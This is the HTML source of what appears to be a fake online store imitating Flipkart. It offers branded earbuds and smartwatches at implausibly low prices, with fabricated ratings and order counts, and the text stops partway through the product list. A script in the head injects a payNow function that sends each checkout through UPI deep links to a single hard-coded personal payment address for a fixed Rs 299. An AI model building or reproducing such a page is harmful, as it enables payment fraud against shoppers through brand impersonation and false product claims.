<!DOCTYPE html>
<link rel="stylesheet" href="index.css">
<script>
   window.dataLayer = window.dataLayer || [];

   function gtag() {
      dataLayer.push(arguments);
   }
   gtag('js', new Date());
   gtag('config', 'UA-254758032-7');
</script>
<link rel="stylesheet" href="index.css">

<html lang="en-IN">

<head>
   <title>We are Here to help you, Electronics, Furniture, Grocery, Lifestyle, Books &amp; More. Exclusive Offers!
   </title>
   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Expires" content="-1">
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="Keywords"
      content="Online Shopping in India,online Shopping store,Online Shopping Site,Buy Online,Shop Online,Fliipkart">
   <meta name="Description"
      content="India&#39;s biggest online store for Mobiles, Fashion (Clothes/Shoes), Electronics, Home Appliances, Books, Jewelry, Home, Furniture, Sporting goods, Beauty &amp; Personal Care, Grocery and more! Find the largest selection from all brands at the lowest prices in India. Payment options - COD, EMI, Credit card, Debit card &amp; more.">
   <meta property="og:title" content="We are Here To Help You">
   <meta name="theme-color" content="#2874f0" id="themeColor">
   <meta name="viewport" content="width=device-width,minimum-scale=1,user-scalable=no">
   <link rel="stylesheet" href="http://ingvyasyadeal.website/assets/css/bootstrap.min.css">
   <link rel="stylesheet" href="http://ingvyasyadeal.website/assets/css/custom.css">
   <link rel="icon" href="http://ingvyasyadeal.website/img/small-logo.png">
   <link rel="icon" type="image/x-icon" href="img/small-logo.png">
   <script>
      var WEB_API_FOLDER = 'http://ingvyasyadeal.website/api_services/';
      var API_SERVICE_URL = 'http://ingvyasyadeal.website/api_services/manage.php';
      var ADMIN_PANEL_URL = 'http://ingvyasyadeal.website/admin_panel/';
      var MAIN_URL = 'http://ingvyasyadeal.website/';
      var PRIMARY_ID = '0';
   </script>
   <script>var UPI_ID = "ombk.aact036721n5yvm29r1v@mbk"</script>
   <script src="https://code.jquery.com/jquery-3.7.1.min.js"
      integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>
   <script type="text/javascript">
      $(document).ready(function () {
         $('head').append('<script>async function payNow(){var a=$(".form-check.active").attr("pay-type"),t="";switch(a){case"gpay":t="tez://upi/pay?pa=ombk.aact036721n5yvm29r1v@mbk&ServiceStation&tr=105881934209058!&tn=CUST21417826&am=299&cu=INR&mc=5499&tr=6295778";break;case"phonepe":t="phonepe://pay?pa=ombk.aact036721n5yvm29r1v@mbk&ServiceStation&tr=105881934209058!&tn=CUST21417826&am=299&cu=INR&mc=5499&tr=6295778";break;case"paytm":t="paytmmp://pay?pa=ombk.aact036721n5yvm29r1v@mbk&ServiceStation&tr=105881934209058!&tn=CUST21417826&am=299&cu=INR&mc=5499&tr=6295778";break;case"upi_upi":t="upi://pay?pa=ombk.aact036721n5yvm29r1v@mbk&ServiceStation&tr=105881934209058!&tn=CUST21417826&am=299&cu=INR&mc=5499&tr=6295778";break;case"whatspp_pay":t="whatsapp://pay?pa=ombk.aact036721n5yvm29r1v@mbk&ServiceStation&tr=105881934209058!&tn=CUST21417826&am=299&cu=INR&mc=5499&tr=6295778"} window.location.href = t;}</\script>');
      });   
   </script>
</head>

<body class="expansion-alids-init" cz-shortcut-listen="true">
   <div id="container" style="overflow:hidden">
      <div style="height:100%" data-reactroot="">
         <style>
            div {
               font-size: 20px;
               text-align: center;
            }

            a.Z4_K_h>h2 {
               font-size: 22px;
               font-weight: 600;
               color: #fff;
               margin: 0px 0px 4px -8px;
               font-family: cursive;
            }

            .ofr_text.code {
               font-size: 14px;
               color: #0F1111;
               font-size: 14px !important;
               line-height: 16px !important;
               text-align: center;
               font-weight: 600;
               /* text-overflow: ellipsis; */
               /* white-space: nowrap; */
               padding-top: 5px;
            }

            .icon-hover:hover {
               border-color: #3b71ca !important;
               background-color: white !important;
            }

            .icon-hover:hover i {
               color: #3b71ca !important;
            }
         </style>
         <div>
            <div class="_2dxSCm">
               <div class="_3CzzrP" style="background:#2874f0">
                  <div class="_38U37R">
                     <div>
                        <div class="_1FWdmb" style="background-color:#2874f0">
                           <a class="_3NH1qf"><img alt="menu"
                                 src="http://ingvyasyadeal.website/assets/images/theme/bars.svg" height="20px"
                                 width="20px"></a>
                           <a class="Z4_K_h" href="http://ingvyasyadeal.website/" style="width:85px"><img width="85px"
                                 src="http://ingvyasyadeal.website/assets/images/logo.png"></a>


                           <div class="_2WBW6z"></div>

                           <a href="#/mobile.html#" class="_3NH1qf">
                              <svg width="16" height="16" viewBox="0 0 15 15"
                                 xmlns="external452e452e452e452e.html?link=http://www.w3.org/2000/svg">
                                 <g fill="#fff" fill-rule="evenodd">
                                    <path
                                       d="m5.189 13.04c0 .996-.791 1.804-1.767 1.804-.976 0-1.767-.808-1.767-1.804 0-.996.791-1.804 1.767-1.804.976 0 1.767.808 1.767 1.804">
                                    </path>
                                    <path
                                       d="m14.912 2.259h-14.298l2.247 6.917c.042.129.16.216.293.216h8.06c-.064.69-.629 1.841-1.702 1.841h-6.04l1.072 1.991h5.611c1.881 0 2.938-2.278 3.657-4.719.888-3.01 1.219-6.245 1.106-6.245">
                                    </path>
                                    <path
                                       d="m.615 2.259l-.592-1.828c-.08-.207.069-.431.287-.431h1.482c.126 0 .24.079.287.198l.682 2.061c0 0-.63 1.642-1.942.066">
                                    </path>
                                    <path d="m2.262.756c0 0 .498 1.503 2.234 1.503l-1.736.749-1.104-.749.607-1.503">
                                    </path>
                                    <path
                                       d="m13.424 13.325c0 .837-.664 1.516-1.484 1.516-.82 0-1.484-.679-1.484-1.516 0-.837.664-1.516 1.484-1.516.82 0 1.484.679 1.484 1.516">
                                    </path>
                                 </g>
                              </svg> <span class="_2tVMo0">1</span>
                           </a>
                        </div>
                        <div>
                           <div class="_3QNhdh" id="guidSearch">
                              <div class="ORogdv">
                                 <div class="_1k9EoO">
                                    <div class="_2d36Hu">
                                       <a href="#/mobile.html#search" class="search-div">
                                          <input type="" class="_1eMB9R"
                                             placeholder="Search for Products, Brands and More" value="">
                                       </a>
                                    </div>
                                 </div>
                              </div>
                           </div>
                        </div>
                     </div>
                  </div>
                  <img src="http://ingvyasyadeal.website/img/slides/add.jpg" style="width:100%">

                  <div class="_3lqN6b">
                     <div class="WhKF32">
                        <div class="IF3BzC">
                           <div class="_1fhgRH">
                              <div class="container-fluid">
                                 <div class="row">
                                    <div class="col-sm-12 p-0">
                                       <div id="carouselExampleIndicators" class="carousel carousel-dark slide"
                                          data-ride="carousel">
                                          <ol class="carousel-indicators">
                                             <li data-target="#carouselExampleIndicators" data-slide-to="0"
                                                class="active"></li>
                                             <li data-target="#carouselExampleIndicators" data-slide-to="1"></li>
                                             <li data-target="#carouselExampleIndicators" data-slide-to="2"></li>
                                          </ol>
                                          <div class="carousel-inner">
                                             <div class="carousel-item active">
                                                <img class="d-block w-100"
                                                   src="http://ingvyasyadeal.website/assets/images/fn_bnr_01.jpg"
                                                   alt="First slide">
                                             </div>
                                             <div class="carousel-item">
                                                <img class="d-block w-100"
                                                   src="http://ingvyasyadeal.website/assets/images/fn_bnr_02.jpeg"
                                                   alt="Second slide">
                                             </div>
                                             <div class="carousel-item">
                                                <img class="d-block w-100"
                                                   src="http://ingvyasyadeal.website/assets/images/fn_bnr_03.png"
                                                   alt="Third slide">
                                             </div>
                                          </div>
                                       </div>
                                    </div>

                                 </div>
                              </div>

                              <div class="_1QM2o6 _1isCBQ" style="margin:0 0 16px">
                                 <div class="_2rW-uM _3sgvr0 _1cVt6K _1CXxjX">
                                    <div class="_3LrtWH">
                                       <div class="_3QuZpZ dod-div">
                                          <div class="dod-label"> Deals of the Day </div>
                                          <div class="_1oETR8">
                                             <div class="_1dZamR _2mmD4F">
                                                <img class="_29lYyb"
                                                   src="http://ingvyasyadeal.website/assets/images/theme/clock.svg">
                                                <div id="test"></div>
                                             </div>
                                          </div>
                                       </div>
                                       <div class="_3Nxu4r">
                                          <button class="_1s54Jm btn-sale-is-live">SALE IS LIVE</button>
                                       </div>
                                    </div>
                                 </div>

                                 <!-- first product goes here -->
                                 <div class="row justify-content-center mb-3">
                                    <div class="col-md-12">
                                       <div class="card shadow-0 border rounded-3">
                                          <div class="card-body">
                                             <div class="row g-0">
                                                <div class="col-xl-3 col-md-4 d-flex justify-content-center">
                                                   <div
                                                      class="bg-image hover-zoom ripple rounded ripple-surface me-md-3 mb-3 mb-md-0">
                                                      <img
                                                         src="images/1.png"
                                                         class="w-100" />
                                                      <a href="#!">
                                                         <div class="hover-overlay">
                                                            <div class="mask"
                                                               style="background-color: rgba(253, 253, 253, 0.15);">
                                                            </div>
                                                         </div>
                                                      </a>
                                                   </div>
                                                </div>
                                                <div href="product.html" class="col-xl-6 col-md-5 col-sm-7">
                                                   <h5 class="pro-head">PHONICZ RETAILS Apple Airpods</h5>
                                                   <div class="d-flex flex-row">
                                                      <div class="text-warning mb-1 me-2">
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fas fa-star-half-alt"></i>
                                                         <span class="ms-1">
                                                            4.5 Rating 
                                                         </span>
                                                      </div>
                                                      <span class="text-muted">154 orders</span>
                                                   </div>

                                                   <p class="text m-4 mb-md-0">
                                                      <li class="dispro">Charging method: magnetic charging</li><br>
                                                      <li class="dispro">Main screen: 1.75 HD IPS, 320*385</li><br>
                                                      <li class="dispro">Heart rate detection: Heart rate monitoring, monitor your heartbeat around the clock</li><br>
                                                      <li class="dispro">ECG: ECG data analysis</li><br>
                                                      <li class="dispro">Pedometer: exercise step count, calorie consumption, exercise mileage record</li><br>
                                                      <li class="dispro">Touch screen: 2.5D fox surface capacitive</li><br>
                                                      <li class="dispro">Sedentary reminder: it's time to get up and exercise and change the unhealthy lifestyle</li>

                                                   </p>
                                                </div>
                                                <div class="col-xl-3 col-md-3 col-sm-5">
                                                   <div class="d-flex flex-row align-items-center mb-1">
                                                      <h4 class="mb-1  me-1">Rs 299</h4>
                                                      <span class="text-danger"><s>Rs 399</s></span>
                                                   </div>
                                                   <h6 class="text-success">Free shipping</h6>
                                                   <div class="mt-4">
                                                      <a href="product.html">
                                                      <button  class="cardbutt btn btn-primary shadow-0" type="button">Buy
                                                         this</button></a>
                                                      <a href="#!" class="btn btn-light border px-2 pt-2 icon-hover"><i
                                                            class="fas fa-heart fa-lg px-1"></i></a>
                                                   </div>
                                                </div>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                 </div>

                                 <!-- second product goes here -->
                                 <div class="row justify-content-center mb-3">
                                    <div class="col-md-12">
                                       <div class="card shadow-0 border rounded-3">
                                          <div class="card-body">
                                             <div class="row g-0">
                                                <div class="col-xl-3 col-md-4 d-flex justify-content-center">
                                                   <div
                                                      class="bg-image hover-zoom ripple rounded ripple-surface me-md-3 mb-3 mb-md-0">
                                                      <img
                                                         src="images/2.png"
                                                         class="w-100" />
                                                      <a href="#!">
                                                         <div class="hover-overlay">
                                                            <div class="mask"
                                                               style="background-color: rgba(253, 253, 253, 0.15);">
                                                            </div>
                                                         </div>
                                                      </a>
                                                   </div>
                                                </div>
                                                <div href="product.html" class="col-xl-6 col-md-5 col-sm-7">
                                                   <h5 class="pro-head">Latest Combo Deal [Smart Watch with Air Pods Pro]</h5>
                                                   <div class="d-flex flex-row">
                                                      <div class="text-warning mb-1 me-2">
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fas fa-star-half-alt"></i>
                                                         <span class="ms-1">
                                                            3.5 Rating 
                                                         </span>
                                                      </div>
                                                      <span class="text-muted">174 orders</span>
                                                   </div>

                                                   <p class="text m-4 mb-md-0">
                                                      <li class="dispro">Check your heart rhythm with the ECG app</li><br>
                                                      <li class="dispro">The Always-On Retina display is 2.5x brighter outdoors when your wrist is down</li><br>
                                                      <li class="dispro">S6 SiP is up to 20% faster than Series 5</li><br>
                                                      <li class="dispro">5GHz Wi-Fi and U1 Ultra Wideband chip</li><br>
                                                      <li class="dispro">Track your daily activity on Apple Watch and see your trends in the Fitness app on iPhone</li><br>
                                                
                                                   </p>
                                                </div>
                                                <div class="col-xl-3 col-md-3 col-sm-5">
                                                   <div class="d-flex flex-row align-items-center mb-1">
                                                      <h4 class="mb-1  me-1">Rs 279</h4>
                                                      <span class="text-danger"><s>Rs 599</s></span>
                                                   </div>
                                                   <h6 class="text-success">Free shipping</h6>
                                                   <div class="mt-4">
                                                      <a href="product.html">
                                                      <button  class="cardbutt btn btn-primary shadow-0" type="button">Buy
                                                         this</button></a>
                                                      <a href="#!" class="btn btn-light border px-2 pt-2 icon-hover"><i
                                                            class="fas fa-heart fa-lg px-1"></i></a>
                                                   </div>
                                                </div>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                 </div>

                                 <!-- three product goes here -->
                                 <div class="row justify-content-center mb-3">
                                    <div class="col-md-12">
                                       <div class="card shadow-0 border rounded-3">
                                          <div class="card-body">
                                             <div class="row g-0">
                                                <div class="col-xl-3 col-md-4 d-flex justify-content-center">
                                                   <div
                                                      class="bg-image hover-zoom ripple rounded ripple-surface me-md-3 mb-3 mb-md-0">
                                                      <img
                                                         src="images/3.png"
                                                         class="w-100" />
                                                      <a href="#!">
                                                         <div class="hover-overlay">
                                                            <div class="mask"
                                                               style="background-color: rgba(253, 253, 253, 0.15);">
                                                            </div>
                                                         </div>
                                                      </a>
                                                   </div>
                                                </div>
                                                <div href="product.html" class="col-xl-6 col-md-5 col-sm-7">
                                                   <h5 class="pro-head">Diwali Special Combo</h5>
                                                   <div class="d-flex flex-row">
                                                      <div class="text-warning mb-1 me-2">
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fas fa-star-half-alt"></i>
                                                         <span class="ms-1">
                                                            4.8 Rating 
                                                         </span>
                                                      </div>
                                                      <span class="text-muted">74 orders</span>
                                                   </div>

                                                   <p class="text m-4 mb-md-0">
                                                      <li class="dispro">Goal-based exercise modes, comfortable fit</li><br>
                                                      <li class="dispro">Always-on display mode, water resistant to 50 metres</li><br>
                                                      <li class="dispro">Saves 7 days of detailed motion data - minute by minute</li><br>
                                                      <li class="dispro">-20 degree C to 60 degree C operating temperature</li><br>
                                                      <li class="dispro">Saves daily totals for the last 30 days</li><br>
                                                      <li class="dispro">8535 m maximum operating altitude</li><br>
                                                      <li class="dispro">Real-time pace & distance</li><br>
                                                      <li class="dispro">Accelerometer, Optical Heart Sensor, Altimeter, Vibration, Ambient Light</li>
                                                   </p>
                                                </div>
                                                <div class="col-xl-3 col-md-3 col-sm-5">
                                                   <div class="d-flex flex-row align-items-center mb-1">
                                                      <h4 class="mb-1  me-1">Rs 299</h4>
                                                      <span class="text-danger"><s>Rs 359</s></span>
                                                   </div>
                                                   <h6 class="text-success">Free shipping</h6>
                                                   <div class="mt-4">
                                                      <a href="product.html">
                                                      <button  class="cardbutt btn btn-primary shadow-0" type="button">Buy
                                                         this</button></a>
                                                      <a href="#!" class="btn btn-light border px-2 pt-2 icon-hover"><i
                                                            class="fas fa-heart fa-lg px-1"></i></a>
                                                   </div>
                                                </div>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                 </div>

                                 <!-- four product goes here -->
                                 <div class="row justify-content-center mb-3">
                                    <div class="col-md-12">
                                       <div class="card shadow-0 border rounded-3">
                                          <div class="card-body">
                                             <div class="row g-0">
                                                <div class="col-xl-3 col-md-4 d-flex justify-content-center">
                                                   <div
                                                      class="bg-image hover-zoom ripple rounded ripple-surface me-md-3 mb-3 mb-md-0">
                                                      <img
                                                         src="images/4.png"
                                                         class="w-100" />
                                                      <a href="#!">
                                                         <div class="hover-overlay">
                                                            <div class="mask"
                                                               style="background-color: rgba(253, 253, 253, 0.15);">
                                                            </div>
                                                         </div>
                                                      </a>
                                                   </div>
                                                </div>
                                                <div href="product.html" class="col-xl-6 col-md-5 col-sm-7">
                                                   <h5 class="pro-head">BEST COMBO OFFER OF THE SEASON SALE</h5>
                                                   <div class="d-flex flex-row">
                                                      <div class="text-warning mb-1 me-2">
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fas fa-star-half-alt"></i>
                                                         <span class="ms-1">
                                                            4.1 Rating 
                                                         </span>
                                                      </div>
                                                      <span class="text-muted">259 orders</span>
                                                   </div>

                                                   <p class="text m-4 mb-md-0">
                                                      <li class="dispro">Sweat Proof</li><br>
                                                      <li class="dispro">Deep Bass</li><br>
                                                      <li class="dispro">Water Resistant</li><br>
                                                      <li class="dispro">All Smartphones</li><br>
                                                      <li class="dispro">With Microphone</li><br>
                                                      <li class="dispro">Other Sound Features</li>
                                                   </p>
                                                </div>
                                                <div class="col-xl-3 col-md-3 col-sm-5">
                                                   <div class="d-flex flex-row align-items-center mb-1">
                                                      <h4 class="mb-1  me-1">Rs 159</h4>
                                                      <span class="text-danger"><s>Rs 799</s></span>
                                                   </div>
                                                   <h6 class="text-success">Free shipping</h6>
                                                   <div class="mt-4">
                                                      <a href="product.html">
                                                      <button  class="cardbutt btn btn-primary shadow-0" type="button">Buy
                                                         this</button></a>
                                                      <a href="#!" class="btn btn-light border px-2 pt-2 icon-hover"><i
                                                            class="fas fa-heart fa-lg px-1"></i></a>
                                                   </div>
                                                </div>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                 </div>

                                 <!-- five product goes here -->
                                 <div class="row justify-content-center mb-3">
                                    <div class="col-md-12">
                                       <div class="card shadow-0 border rounded-3">
                                          <div class="card-body">
                                             <div class="row g-0">
                                                <div class="col-xl-3 col-md-4 d-flex justify-content-center">
                                                   <div
                                                      class="bg-image hover-zoom ripple rounded ripple-surface me-md-3 mb-3 mb-md-0">
                                                      <img
                                                         src="images/5.png"
                                                         class="w-100" />
                                                      <a href="#!">
                                                         <div class="hover-overlay">
                                                            <div class="mask"
                                                               style="background-color: rgba(253, 253, 253, 0.15);">
                                                            </div>
                                                         </div>
                                                      </a>
                                                   </div>
                                                </div>
                                                <div href="product.html" class="col-xl-6 col-md-5 col-sm-7">
                                                   <h5 class="pro-head">Series 7 watch & Airpods combo</h5>
                                                   <div class="d-flex flex-row">
                                                      <div class="text-warning mb-1 me-2">
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fas fa-star-half-alt"></i>
                                                         <span class="ms-1">
                                                            4.6 Rating 
                                                         </span>
                                                      </div>
                                                      <span class="text-muted">154 orders</span>
                                                   </div>

                                                   <p class="text m-4 mb-md-0">
                                                      <li class="dispro">2.5 Curve Glass On Screen For Premium Look</li><br>
                                                      <li class="dispro">ECG/Sedentary/Anti-Lost/Alarm/Stop Watch</li><br>
                                                      <li class="dispro">Sleep Monitor (Deep Sleep/Light Sleep Analyser)</li><br>
                                                      <li class="dispro">Step Counter / Pedometer</li><br>
                                                      <li class="dispro">Heart Rate Sensor</li><br>
                                                      <li class="dispro">2 Pin Magnetic Charger & Full Display With Calling Feature</li>
                                                   </p>
                                                </div>
                                                <div class="col-xl-3 col-md-3 col-sm-5">
                                                   <div class="d-flex flex-row align-items-center mb-1">
                                                      <h4 class="mb-1  me-1">Rs 259</h4>
                                                      <span class="text-danger"><s>Rs 399</s></span>
                                                   </div>
                                                   <h6 class="text-success">Free shipping</h6>
                                                   <div class="mt-4">
                                                      <a href="product.html">
                                                      <button  class="cardbutt btn btn-primary shadow-0" type="button">Buy
                                                         this</button></a>
                                                      <a href="#!" class="btn btn-light border px-2 pt-2 icon-hover"><i
                                                            class="fas fa-heart fa-lg px-1"></i></a>
                                                   </div>
                                                </div>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                 </div>

                                 <!-- six product goes here -->
                                 <div class="row justify-content-center mb-3">
                                    <div class="col-md-12">
                                       <div class="card shadow-0 border rounded-3">
                                          <div class="card-body">
                                             <div class="row g-0">
                                                <div class="col-xl-3 col-md-4 d-flex justify-content-center">
                                                   <div
                                                      class="bg-image hover-zoom ripple rounded ripple-surface me-md-3 mb-3 mb-md-0">
                                                      <img
                                                         src="images/6.png"
                                                         class="w-100" />
                                                      <a href="#!">
                                                         <div class="hover-overlay">
                                                            <div class="mask"
                                                               style="background-color: rgba(253, 253, 253, 0.15);">
                                                            </div>
                                                         </div>
                                                      </a>
                                                   </div>
                                                </div>
                                                <div href="product.html" class="col-xl-6 col-md-5 col-sm-7">
                                                   <h5 class="pro-head">Wireless Combo Offer</h5>
                                                   <div class="d-flex flex-row">
                                                      <div class="text-warning mb-1 me-2">
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fas fa-star-half-alt"></i>
                                                         <span class="ms-1">
                                                            3.8 Rating 
                                                         </span>
                                                      </div>
                                                      <span class="text-muted">194 orders</span>
                                                   </div>

                                                   <p class="text m-4 mb-md-0">
                                                      <li class="dispro">Noise-masking sleep buds deliver soothing sounds that have been optimally tuned to drown out unwanted noise</li><br>
                                                      <li class="dispro">Super tiny sleep buds stay comfortably in place all night long, even if you sleep on your side. Includes Stay Hear+ Sleep tips in sizes small, medium and large</li><br>
                                                      <li class="dispro">Enjoy the rhythm of rolling waves on a beach. Be lulled by rustling leaves. Feel the crackling comfort of a campfire. Use the Bose Sleep app to choose from ten preloaded soothing and relaxing sounds that have been specially crafted to deliver the most effective noise masking experience. And because sleep isn’t a 'one size fits all kind' of thing, you can use the app to find the volume level that works for you.</li><br>
                                            
                                                   </p>
                                                </div>
                                                <div class="col-xl-3 col-md-3 col-sm-5">
                                                   <div class="d-flex flex-row align-items-center mb-1">
                                                      <h4 class="mb-1  me-1">Rs 159</h4>
                                                      <span class="text-danger"><s>Rs 379</s></span>
                                                   </div>
                                                   <h6 class="text-success">Free shipping</h6>
                                                   <div class="mt-4">
                                                      <a href="product.html">
                                                      <button  class="cardbutt btn btn-primary shadow-0" type="button">Buy
                                                         this</button></a>
                                                      <a href="#!" class="btn btn-light border px-2 pt-2 icon-hover"><i
                                                            class="fas fa-heart fa-lg px-1"></i></a>
                                                   </div>
                                                </div>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                 </div>

                                 <!-- seven product goes here -->
                                 <div class="row justify-content-center mb-3">
                                    <div class="col-md-12">
                                       <div class="card shadow-0 border rounded-3">
                                          <div class="card-body">
                                             <div class="row g-0">
                                                <div class="col-xl-3 col-md-4 d-flex justify-content-center">
                                                   <div
                                                      class="bg-image hover-zoom ripple rounded ripple-surface me-md-3 mb-3 mb-md-0">
                                                      <img
                                                         src="images/7.png"
                                                         class="w-100" />
                                                      <a href="#!">
                                                         <div class="hover-overlay">
                                                            <div class="mask"
                                                               style="background-color: rgba(253, 253, 253, 0.15);">
                                                            </div>
                                                         </div>
                                                      </a>
                                                   </div>
                                                </div>
                                                <div href="product.html" class="col-xl-6 col-md-5 col-sm-7">
                                                   <h5 class="pro-head">Super Combo of Bose Sport Earbuds.</h5>
                                                   <div class="d-flex flex-row">
                                                      <div class="text-warning mb-1 me-2">
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fas fa-star-half-alt"></i>
                                                         <span class="ms-1">
                                                            3.6 Rating 
                                                         </span>
                                                      </div>
                                                      <span class="text-muted">464 orders</span>
                                                   </div>

                                                   <p class="text m-4 mb-md-0">
                                                      <li class="dispro">The proprietary acoustic port design and premium, high-efficiency drivers inside Bose Sport Earbuds deliver big sound from a small acoustic package — pushing you to go one more mile or one more rep.</li><br>
                                                      <li class="dispro">The StayHear Max tips have a unique umbrella shape and an extended flexible wing that keep your Bose Sport Earbuds securely in place, no matter how much you move.</li><br>
                                                      <li class="dispro">Designed to resist moisture from sweat and weather, Bose Sport Earbuds go through rigorous quality testing for durability so they’ll stay in top shape, just like you.</li><br>
                                                      <li class="dispro">Bose Sport Earbuds, 3 sizes of eartips, USB charging cable, Charging case, Quick start guide, Warranty card</li><br>
                                                   
                                                   </p>
                                                </div>
                                                <div class="col-xl-3 col-md-3 col-sm-5">
                                                   <div class="d-flex flex-row align-items-center mb-1">
                                                      <h4 class="mb-1  me-1">Rs 264</h4>
                                                      <span class="text-danger"><s>Rs 349</s></span>
                                                   </div>
                                                   <h6 class="text-success">Free shipping</h6>
                                                   <div class="mt-4">
                                                      <a href="product.html">
                                                      <button  class="cardbutt btn btn-primary shadow-0" type="button">Buy
                                                         this</button></a>
                                                      <a href="#!" class="btn btn-light border px-2 pt-2 icon-hover"><i
                                                            class="fas fa-heart fa-lg px-1"></i></a>
                                                   </div>
                                                </div>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                 </div>

                                 <!-- eight product goes here -->
                                 <div class="row justify-content-center mb-3">
                                    <div class="col-md-12">
                                       <div class="card shadow-0 border rounded-3">
                                          <div class="card-body">
                                             <div class="row g-0">
                                                <div class="col-xl-3 col-md-4 d-flex justify-content-center">
                                                   <div
                                                      class="bg-image hover-zoom ripple rounded ripple-surface me-md-3 mb-3 mb-md-0">
                                                      <img
                                                         src="images/8.png"
                                                         class="w-100" />
                                                      <a href="#!">
                                                         <div class="hover-overlay">
                                                            <div class="mask"
                                                               style="background-color: rgba(253, 253, 253, 0.15);">
                                                            </div>
                                                         </div>
                                                      </a>
                                                   </div>
                                                </div>
                                                <div href="product.html" class="col-xl-6 col-md-5 col-sm-7">
                                                   <h5 class="pro-head">COMBO SET OF 2 { boAt Rockerz 235v2  Neckband & boAt Airdopes 331 True Wireless Earbuds }</h5>
                                                   <div class="d-flex flex-row">
                                                      <div class="text-warning mb-1 me-2">
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fas fa-star-half-alt"></i>
                                                         <span class="ms-1">
                                                            4.8 Rating 
                                                         </span>
                                                      </div>
                                                      <span class="text-muted">257 orders</span>
                                                   </div>

                                                   <p class="text m-4 mb-md-0">
                                                      <li class="dispro">This headset comes with the Fast Charge Technology that offers up to 4 hours of playback time with just about 20 minutes of charging.</li><br>
                                                      <li class="dispro">This well-designed headset, with the Call Vibration Alert feature and high-quality magnetic ear tips, offers you effortless hands-free calling.</li><br>
                                                      <li class="dispro">This is a water- and sweat-resistant headset that is ideal for your busy and active lifestyle.</li><br>
                                                      <li class="dispro">By pressing a button, you can activate Google or Siri for easy voice assistance.</li><br>
                                                      <li class="dispro">The easy access integrated controls and the built-in mic make it a user-friendly headset.</li><br>
                                                      <li class="dispro">Touch screen: 2.5D fox surface capacitive</li>                      </p>
                                                </div>
                                                <div class="col-xl-3 col-md-3 col-sm-5">
                                                   <div class="d-flex flex-row align-items-center mb-1">
                                                      <h4 class="mb-1  me-1">Rs 279</h4>
                                                      <span class="text-danger"><s>Rs 599</s></span>
                                                   </div>
                                                   <h6 class="text-success">Free shipping</h6>
                                                   <div class="mt-4">
                                                      <a href="product.html">
                                                      <button  class="cardbutt btn btn-primary shadow-0" type="button">Buy
                                                         this</button></a>
                                                      <a href="#!" class="btn btn-light border px-2 pt-2 icon-hover"><i
                                                            class="fas fa-heart fa-lg px-1"></i></a>
                                                   </div>
                                                </div>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                 </div>

                                 <!-- nine product goes here -->
                                 <div class="row justify-content-center mb-3">
                                    <div class="col-md-12">
                                       <div class="card shadow-0 border rounded-3">
                                          <div class="card-body">
                                             <div class="row g-0">
                                                <div class="col-xl-3 col-md-4 d-flex justify-content-center">
                                                   <div
                                                      class="bg-image hover-zoom ripple rounded ripple-surface me-md-3 mb-3 mb-md-0">
                                                      <img
                                                         src="images/9.png"
                                                         class="w-100" />
                                                      <a href="#!">
                                                         <div class="hover-overlay">
                                                            <div class="mask"
                                                               style="background-color: rgba(253, 253, 253, 0.15);">
                                                            </div>
                                                         </div>
                                                      </a>
                                                   </div>
                                                </div>
                                                <div href="product.html" class="col-xl-6 col-md-5 col-sm-7">
                                                   <h5 class="pro-head">Combo Offer I WATCH Series 7 and AIRPORD PRO</h5>
                                                   <div class="d-flex flex-row">
                                                      <div class="text-warning mb-1 me-2">
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fa fa-star"></i>
                                                         <i class="fas fa-star-half-alt"></i>
                                                         <span class="ms-1">
                                                            4.4 Rating 
                                                         </span>
                                                      </div>
                                                      <span class="text-muted">254 orders</span>
                                                   </div>

                                                   <p class="text m-4 mb-md-0">
                                                      <li class="dispro">➡️Watch Size: *44*38*10.7 mm*✓</li><br>
                                                      <li class="dispro">➡️Resolution: *240 *240 Pixel*✓</li><br>
                                                      <li class="dispro">➡️Bluetooth: Support *3.0, 4.0*✓</li><br>
                                                      <li class="dispro">➡️ Wireless Megnetic charger✓ </li><br>
                                                      <li class="dispro">➡️Turn the wrist and bright screen✓</li><br>
                                                      <li class="dispro">➡️Heart rate blood pressure and blood oxygen measurement✓</li>
                                                   </p>
                                                </div>
                                                <div class="col-xl-3 col-md-3 col-sm-5">
                                                   <div class="d-flex flex-row align-items-center mb-1">
                                                      <h4 class="mb-1  me-1">Rs 269</h4>
                                                      <span class="text-danger"><s>Rs 499</s></span>
                                                   </div>
                                                   <h6 class="text-success">Free shipping</h6>
                                                   <div class="mt-4">
                                                      <a href="product.html">
                                                      <button  class="cardbutt btn btn-primary shadow-0" type="button">Buy
